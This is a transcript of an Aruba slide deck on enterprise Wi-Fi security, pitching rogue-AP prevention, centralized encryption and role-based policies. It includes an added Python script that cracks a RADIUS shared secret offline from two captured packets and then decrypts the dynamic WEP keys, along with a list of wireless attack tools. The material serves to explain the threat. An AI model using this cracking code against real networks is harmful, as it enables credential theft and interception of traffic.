
Getting Smart About Wireless Security




Presentation Transcript


  1. Getting Smart About Wireless Security

  2. The Existence of Wireless LANs is a Security Threat – A Case Study [Diagram: New York City; your company; your employee] • Employee is a subscriber to a public Wi-Fi hotspot service • Employee's laptop automatically associates with the public Wi-Fi hotspot • Employee plugs into the wired corporate network • Traffic is bridged between the public hotspot and the enterprise network

  3. Mobility Is An Interior Security Threat: Conventional Perimeter Security Has Been Rendered Irrelevant • Wireless LAN technology is a wired security threat • New mobile users and devices appear every day • Traditional security products do not work for mobility: they are insecure, perform poorly, cost too much and break mobility • Security needs to be addressed from the inside out

  4. Aruba Solution: Internal Mobile Security. Conventional Perimeter Security Has Been Rendered Irrelevant [Diagram: five layers, stacked from the bottom up] 1. Lock the Air 2. Lock the Wire 3. Lock the User 4. Lock the Device 5. Lock the Resources

  5. Aruba At A Glance: At the Intersection of Mobility, Wireless and Security • Founded: February 2002 • Investors: Sequoia, Matrix, Trinity, WK Technology • Funding: $77M to date, nearing profitability • Traction: hundreds of major customers • Employees: 130 • Patents: multiple key patents • Industry recognition

  6. Aruba's Centralized Security Solutions: Security from the Inside Out [Diagram: corporate network (employees), Internet access (visitors), VoIP services (voice); open ports; guest laptop; email, web and storage servers; OSDP partners; IP transport] • Lock the Air • Easy deployment of secure WLAN • Plug holes in exposed WLANs • Protect users, devices and networks from worms and viruses • Create and enforce corporate policies • Defend exposed wired ports

  7. How It's Deployed: Non-disruptive to Existing Network [Diagram: data center deployment and wiring closet deployment; Aruba 800, Aruba 2400 and Aruba 5000 switches; floors 1 and 2; 10/100 Mbps links; data center backbone]

  8. Intrusion Detection and Prevention: Hackers Can Trap Users, Grab Data and Pretend to be Valid Users [Diagram: wireless intrusion detection]

  9. A Myriad of Intrusion Tools / Techniques: Monkey Jack, Associate Flood, ESSID Jack, Void11, AirJack, Auth Flood, Wellenreiter, ASLEAP, HostAP, Kismet, FakeAP Flood, WLAN Jack, Ttcp-WiFi, DeAuth Flood

  10. All Are Detected, Stations Blacklisted

  11. MAC Address Spoofing Detection

  12. De-Auth Attacks

  13. Netstumbler

  14. Aruba Solution: Internal Mobile Security. Defense In Depth: Locking Down In Layers [Diagram: five layers, stacked from the bottom up] 1. Lock the Air 2. Lock the Wire 3. Lock the User 4. Lock the Device 5. Lock the Resources

  15. The Internal Network is Insecure: Anyone can tap into internal corporate networks. Case Study: Rogue Access Points

  16. Getting Your RADIUS Password is Simple [Diagram: rogue AP, client, gateway, RADIUS server; De-Auth] • Hacker finds the rogue access point before you do • Uses ARP poisoning to sniff all the traffic between the AP and the gateway • Sends a de-authentication packet to a client

  17. How safe are your RADIUS passwords? Getting Your RADIUS Password is Simple [Diagram: Access-Request from the AP, Access-Challenge from the RADIUS server] • Hacker finds the rogue access point before you do • Uses ARP poisoning to sniff all the traffic between the AP and the gateway • Sends a de-authentication packet to a client • Client automatically re-authenticates • AP sends requests to the RADIUS server • With just 2 packets and less than 1 second with a rogue AP, a hacker can perform an offline dictionary attack on your RADIUS server shared secret: the Response Authenticator in the Access-Challenge is an MD5 hash over the response, the Request Authenticator from the Access-Request and the shared secret, and everything in that hash except the secret is visible on the wire

  18. So Is Getting ALL Your Data: How safe is your data? [Diagram: Access-Request, Access-Accept] • Client finishes authentication and the AP sends the request to the RADIUS server • RADIUS server accepts the user and passes the encrypted keys to the AP • Since the hacker will find out your RADIUS password, they will know your dynamic WEP keys too: the keys in the Access-Accept are encrypted only with the shared secret and the Request Authenticator that was already captured in the clear • With your WEP keys, all traffic can be sniffed directly.
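The two-packet attack from slides 16 through 18, worked through as an added example (this is not code from the slides or from Aruba). The packets, the shared secret `aruba123`, the word list and the 13-byte key are all constructed here so it runs offline; the Response Authenticator follows RFC 2865 section 3 and the key wrapping follows RFC 2548 (MS-MPPE-Recv-Key). `demo()` first recovers the shared secret from a captured Access-Request/Access-Challenge pair by dictionary attack, then uses that secret to unwrap the dynamic WEP key carried in the later Access-Accept.

```python
"""Offline dictionary attack on a captured RADIUS exchange (slides 16-18).

Added example, not code from the slides or from Aruba.  The packets, the
shared secret, the word list and the key material are all constructed here
so that the attack runs offline; the packet and key formats follow
RFC 2865 (RADIUS) and RFC 2548 (MS-MPPE-*-Key attributes).
"""
import hashlib
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_CHALLENGE = 1, 2, 11
USER_NAME, STATE, VENDOR_SPECIFIC, EAP_MESSAGE = 1, 24, 26, 79
VENDOR_MICROSOFT, MS_MPPE_RECV_KEY = 311, 17


def attr(atype: int, value: bytes) -> bytes:
    """Type(1) Length(1) Value, RFC 2865 section 5."""
    return bytes([atype, 2 + len(value)]) + value


def vsa(vendor: int, vtype: int, value: bytes) -> bytes:
    """Vendor-Specific attribute wrapping one vendor sub-attribute."""
    return attr(VENDOR_SPECIFIC, struct.pack("!I", vendor) + bytes([vtype, 2 + len(value)]) + value)


def build_packet(code: int, ident: int, authenticator: bytes, attrs: bytes) -> bytes:
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + authenticator + attrs


def response_authenticator(code: int, ident: int, req_auth: bytes, attrs: bytes, secret: bytes) -> bytes:
    """RFC 2865 section 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return hashlib.md5(header + req_auth + attrs + secret).digest()


def build_response(code: int, ident: int, req_auth: bytes, attrs: bytes, secret: bytes) -> bytes:
    return build_packet(code, ident, response_authenticator(code, ident, req_auth, attrs, secret), attrs)


def crack_shared_secret(request: bytes, response: bytes, wordlist):
    """Every input to the Response Authenticator except the secret is on the
    wire, so one request/response pair costs one MD5 per candidate word."""
    req_auth = request[4:20]
    code, ident, length = struct.unpack("!BBH", response[:4])
    resp_auth, attrs = response[4:20], response[20:length]
    for word in wordlist:
        candidate = word.encode()
        if response_authenticator(code, ident, req_auth, attrs, candidate) == resp_auth:
            return candidate
    return None


def mppe_encrypt_key(key: bytes, secret: bytes, req_auth: bytes, salt: bytes) -> bytes:
    """RFC 2548 section 2.4.2: Salt || c(1) || c(2) ..., c(i) = p(i) XOR MD5(S || prev)."""
    plain = bytes([len(key)]) + key
    plain += b"\x00" * (-len(plain) % 16)
    out, prev = b"", req_auth + salt
    for i in range(0, len(plain), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(plain[i:i + 16], keystream))
        out, prev = out + block, block
    return salt + out


def mppe_decrypt_key(value: bytes, secret: bytes, req_auth: bytes) -> bytes:
    """Inverse of mppe_encrypt_key; this is what the attacker runs with the cracked secret."""
    salt, cipher = value[:2], value[2:]
    out, prev = b"", req_auth + salt
    for i in range(0, len(cipher), 16):
        keystream = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ k for c, k in zip(cipher[i:i + 16], keystream))
        prev = cipher[i:i + 16]
    return out[1:1 + out[0]]


def demo(secret: bytes = b"aruba123") -> tuple:
    """Replays the three slides with constructed packets and returns
    (recovered secret, recovered WEP key, real WEP key)."""
    wordlist = ["password", "radius", "secret123", "aruba123", "letmein"]  # constructed
    # Slide 17: client is de-authed, re-authenticates, the AP sends an
    # Access-Request and the server answers with an Access-Challenge (EAP in progress).
    req_auth = os.urandom(16)  # Request Authenticator, sent in the clear
    request = build_packet(ACCESS_REQUEST, 7, req_auth,
                           attr(USER_NAME, b"jdoe") + attr(EAP_MESSAGE, b"\x02\x01\x00\x09\x01jdoe"))
    challenge = build_response(ACCESS_CHALLENGE, 7, req_auth,
                               attr(EAP_MESSAGE, b"\x01\x02\x00\x06\x19\x20") + attr(STATE, b"s1"), secret)
    cracked = crack_shared_secret(request, challenge, wordlist)
    # Slide 18: the final Access-Accept carries the dynamic WEP key, wrapped with the same secret.
    wep_key = bytes(range(1, 14))  # constructed 104-bit key
    req_auth2, salt = os.urandom(16), b"\x80\x01"
    accept = build_response(ACCESS_ACCEPT, 8, req_auth2,
                            vsa(VENDOR_MICROSOFT, MS_MPPE_RECV_KEY,
                                mppe_encrypt_key(wep_key, secret, req_auth2, salt)), secret)
    if cracked is None:
        return None, None, wep_key
    vsa_value = accept[20 + 8:]  # skip attr header (2), Vendor-Id (4), vendor type/length (2)
    return cracked, mppe_decrypt_key(vsa_value, cracked, req_auth2), wep_key


if __name__ == "__main__":
    print(demo())
```

The point to take from running it is that nothing in the exchange is keyed by anything the attacker lacks: once the secret falls to the word list, the Access-Accept is an open book, which is exactly why slide 21's design keeps the keys off the APs and on the data center switch, and why a long random shared secret (or a RADIUS transport that is not MD5-only) matters.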

  19. What Do I Do?

  20. Safety with Aruba (Rogue Prevention) • AP detection • See all APs • AP classification • Are they neighbors? • Or are they a threat? • Rogue destruction • Stop users from accessing rogue APs and leave neighbors alone

  21. Safety with Aruba (Centralized Encryption) [Diagram: client, AP, Aruba switch, RADIUS server; Access-Request, Access-Accept] • Client finishes authentication and the AP sends the wireless packet to the switch • The switch sends an Access-Request to the RADIUS server • The RADIUS server sends the Access-Accept and encrypted keys to the switch • All encryption is processed centrally • NO keys are distributed to APs • Your keys never leave the data center

  22. Aruba Solution: Internal Mobile Security. Defense In Depth: Locking Down In Layers [Diagram: five layers, stacked from the bottom up] 1. Lock the Air 2. Lock the Wire 3. Lock the User 4. Lock the Device 5. Lock the Resources

  23. Authenticating The User (802.1X) [Diagram: 802.1X supplicant (contractor, employee), 802.1X authenticator, authentication server] • 802.1X support for explicit and stateful modes • 802.11 encryption: WEP (static and 802.1X dynamic WEP), TKIP, AES • 802.11 authentication methods: EAP-PEAP (Cisco and Microsoft versions), EAP-LEAP (Cisco), EAP-TLS and EAP-TTLS • Extensive support for 3rd-party authentication servers

  24. Other Authentication Methods • For Fat and Thin APs: • Wireless VPNs • Captive Portal/Web Authentication • Stateful 802.1X Authentication (For Fat APs) • MAC Authentication (For Dumb Devices)

  25. Wireless VPNs (Layer 3): From the DMZ to the Intranet [Diagram: DMZ] • Enterprises have sacrificed scalability for security • Mobility limited to a single VLAN

  26. Wireless VPNs: Mobility Mandates a New Model To Ensure Privacy [Diagram: Internet] RAS VPNs vs. WLAN VPNs: • Remote access vs. internal access • Low speed (Mbps) vs. high speed (Gbps) • Fixed user vs. mobile user • VPN client vs. VPN dialer

  27. RSA Certification for 2-factor Authentication • Industry's most prestigious security certification for two-factor authentication • Aruba extends the certification with SecurID caching • Critical in environments where two-factor authentication is mandated • 24/7/365 RSA support for customers using tokens on Aruba products

  28. Aruba Solution: Internal Mobile Security. Defense In Depth: Locking Down In Layers [Diagram: five layers, stacked from the bottom up] 1. Lock the Air 2. Lock the Wire 3. Lock the User 4. Lock the Device 5. Lock the Resources

  29. Dual Stage Authentication Ensures Only Authorized Devices Can Be Used to Access the Network [Diagram: corporate laptop PASS, personal laptop FAIL; RADIUS, domain controller; same username and password on both] • Aruba enforces machine authentication before user authentication • If the device cannot be authenticated, Aruba denies the user access or places the user in a restricted role even if a valid username and password has been provided • Ideal for protecting against personal computers that are likely to be infected with viruses

  30. What's Device Remediation? [Diagram: the same corporate employee] • Ensuring endpoint integrity through automatic security checks • Protecting the network from viruses by requiring stations to pass pre-defined security policies before entering the network • Pass = network access • Fail = redirection to a URL for remediation • Reduces enterprise exposure to security vulnerabilities and targeted attacks

  31. Device Remediation with Zone Labs [Diagram: Zone Integrity client, MSFT 802.1X supplicant, Aruba Wi-Fi switch, Zone Labs Integrity server, Funk SBR 802.1X authentication server; quarantine and healthy paths] 1. Pre-defined security policies are defined at the Zone Integrity server 2. Upon entering the network, user authentication via 802.1X is initiated 3. Once authenticated, users are sent to the Zone Labs Integrity server for security testing 4. If the user passes the security checks, network access is allowed. If the user fails, the Aruba Wi-Fi switch redirects to a URL for remediation or firewalls the user into a group with restricted access

  32. Other Remediation Partnerships • Sygate • Infoexpress (in progress) • Senforce (in progress)

  33. Aruba Solution: Internal Mobile Security. Defense In Depth: Locking Down In Layers [Diagram: five layers, stacked from the bottom up] 1. Lock the Air 2. Lock the Wire 3. Lock the User 4. Lock the Device 5. Lock the Resources

  34. Locking the Resources: What Does It Mean? [Diagram: corporate network (employees), Internet access (visitors), VoIP services (voice); IP transport; centralized wireless LAN security; programmable access points] • Enable secure network access based on [Who, What, When, Where, How]

  35. Step 1: Role-based Separation [Diagram: Aruba access point with Virtual AP 1 (SSID: CORP) and Virtual AP 2 (SSID: GUEST), behind a Layer 2 switch and an Aruba WLAN switch; users classified as trusted user/trusted host, trusted user/un-trusted host, un-trusted user and guest user; RADIUS server, firewall, captive portal, DHCP pool on the default VLAN, router]

  36. Step 2: Stateful Traffic Policies • Built-in ICSA Certified Stateful Firewall • Brings Application Awareness

  37. Result: Integrated Mobile Security. Mobile Security Policies based on {Who, What, When, Where, How} [Diagram: wired intranet, Subnet A, Subnet B] Record 1: USERNAME John Doe; PASSWORD <Cached Identity>; ROLE Employee; AUTHENTICATION RSA SecurID; FIREWALL POLICY Don't allow on Finance Subnets. Record 2: USERNAME John Doe; PASSWORD <One Time Password>; ROLE Employee; AUTHENTICATION RSA SecurID; FIREWALL POLICY Don't allow on Finance Subnets

  38. VoWLAN Security Issues • All 802.11 DoS/MITM attacks apply to voice • VOIP devices don’t use latest encryption or authentication methods • MAC-based authentication can be compromised • Handsets can be stolen/hijacked • SSIDs set aside for voice can be accessed

  39. Weak Voice without Aruba [Diagram: ESSID=Voice, WEP] • Hacker discovers the "Voice" SSID and cracks the WEP key • Spoofs a MAC address to gain access

  40. Strong Voice With Voice Flow Classification • Voice policies can be created that only allow specific traffic types (e.g. SVP or SIP) while denying all others • If unauthorized traffic is discovered, the station can be automatically blacklisted

  41. Voice Flow Classification Technology [Diagram: data and voice flows] • Uniquely identifies, classifies and prioritizes voice traffic • Based on Aruba's user-aware stateful firewall engine • Pre-configured support for voice protocols: Spectralink Voice Priority (SVP), Session Initiation Protocol (SIP), H.323 • Voice traffic from a PDA or laptop can now be automatically identified, classified and prioritized
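A minimal model of the role-based policy on slides 35 through 37 combined with the voice policy on slides 40 and 41, written as an added example (not Aruba code or configuration, and not a model of the product's firewall engine). Roles, rules, MAC addresses and flow records are constructed for the demonstration. The `voice` role permits only SVP (IP protocol 119) and SIP; a station in that role that sends anything else hits the implicit deny and is blacklisted, which is what stops the MAC-spoofing attacker from slide 39 even after the MAC check has been fooled.

```python
"""Role-based firewall policy with automatic blacklisting.

Added example, not Aruba code or configuration: a minimal model of the
role-based separation on slides 35-37 and the voice policy on slides 40-41
(permit only SVP/SIP for the voice role, deny everything else and blacklist
the offending station).  Flow records, role names, MAC addresses and rules
are constructed for the demonstration.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

IPPROTO_TCP, IPPROTO_UDP = 6, 17
IPPROTO_SVP = 119  # SpectraLink Voice Priority runs directly over IP (protocol 119)


@dataclass(frozen=True)
class Flow:
    src_mac: str                  # station identity as seen by the switch
    role: str                     # role assigned at authentication (slide 35)
    proto: int
    dst_port: Optional[int] = None


@dataclass(frozen=True)
class Rule:
    proto: int
    dst_port: Optional[int] = None   # None matches any port
    action: str = "permit"

    def matches(self, flow: Flow) -> bool:
        return flow.proto == self.proto and self.dst_port in (None, flow.dst_port)


# Per-role policies; first match wins, with an implicit deny at the end.
POLICIES: Dict[str, List[Rule]] = {
    "voice": [Rule(IPPROTO_SVP), Rule(IPPROTO_UDP, 5060), Rule(IPPROTO_TCP, 5060)],
    "employee": [Rule(IPPROTO_TCP, 80), Rule(IPPROTO_TCP, 443), Rule(IPPROTO_UDP, 53)],
    "guest": [Rule(IPPROTO_TCP, 80), Rule(IPPROTO_TCP, 443)],
}


class PolicyEngine:
    def __init__(self, policies: Dict[str, List[Rule]], blacklist_roles=("voice",)):
        self.policies = policies
        self.blacklist_roles = set(blacklist_roles)  # roles where any violation blacklists the station
        self.blacklist: Set[str] = set()
        self.log: List[str] = []

    def evaluate(self, flow: Flow) -> str:
        if flow.src_mac in self.blacklist:
            return "drop-blacklisted"
        for rule in self.policies.get(flow.role, []):
            if rule.matches(flow):
                return rule.action
        if flow.role in self.blacklist_roles:  # implicit deny tripped on a locked-down role
            self.blacklist.add(flow.src_mac)
            self.log.append(f"blacklist {flow.src_mac}: role={flow.role} "
                            f"proto={flow.proto} dport={flow.dst_port}")
        return "deny"


def demo() -> List[str]:
    """Runs constructed flows through the engine and returns the verdicts in order."""
    engine = PolicyEngine(POLICIES)
    flows = [
        Flow("00:90:7a:00:00:01", "voice", IPPROTO_SVP),          # real handset: SVP
        Flow("00:90:7a:00:00:01", "voice", IPPROTO_UDP, 5060),    # real handset: SIP
        Flow("00:90:7a:00:00:01", "voice", IPPROTO_TCP, 445),     # spoofed handset MAC probing SMB (slide 39)
        Flow("00:90:7a:00:00:01", "voice", IPPROTO_UDP, 5060),    # same MAC, now blacklisted
        Flow("00:1b:77:00:00:02", "employee", IPPROTO_TCP, 443),  # employee web
        Flow("00:1b:77:00:00:02", "employee", IPPROTO_TCP, 445),  # employee: implicit deny, no blacklist
        Flow("00:1b:77:00:00:03", "guest", IPPROTO_UDP, 53),      # guest DNS: implicit deny, no blacklist
    ]
    verdicts = [engine.evaluate(f) for f in flows]
    for line in engine.log:
        print(line)
    return verdicts


if __name__ == "__main__":
    print(demo())
```

The design choice worth noting is that blacklisting is tied to the role, not to the rule: a voice handset has no legitimate reason to open SMB, so the first violation is treated as evidence of a stolen or spoofed identity, while an employee laptop that hits a deny is simply denied.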

  42. Security TCO: Solving Costly Integration [Diagram: Internet, intranet; add-on components: RF sniffers, firewall, wireless manager, wireless IDS, VPN concentrator; cost figures shown: $40K, $49K, $84K, $9K, $20K] • Start with a LAN • Add APs and wireless users • Add a firewall to isolate wireless from wired • Plus a VPN server to protect wireless traffic • And something to manage the APs • What about wireless intruders? • Aruba APs also function as sniffers • Aruba's WLAN system integrates a firewall • …and a VPN concentrator • …and wireless intrusion protection • …and RF management and optimization • …and centralized management and policy controls

  43. Extending to Open Wired Ports: Mobile Security from the Inside Out for Wired and Wireless [Diagram: corporate network (employees), Internet access (visitors), VoIP services (voice); IP transport; centralized security system; open wired ports] • Extend policies to all open ports based on [Who, What, Where, When, How]

  44. A Complete Wi-Fi System in a Single, Scalable Network Platform: From System Integration to an Integrated System [Diagram: integrated wireless and security switches (Aruba 2400, Aruba 800) with remote manageability; firewall, VPN gateway, wireless intrusion detection, distributed wireless sniffers, RF spectrum management, voice]

  45. Purpose-Built for Wireless Security Processing: Unique Architecture Enables New Wireless Applications [Diagram: wireless control processor, wireless packet processor, wireless security processor, L2/L3 switch with Serial and Power over Ethernet (SPOE)]

  46. Why Aruba? Cheaper, Faster, Better • Dense deployments • Centralized radio calibration • High-performance switching • Real-time air monitoring and performance optimization • Centralized switching, thin APs • Dynamic AP management • Out-of-ceiling deployment • Enterprise-class switching platform • Programmable APs • Modular software architecture

  47. You’re Not Alone…
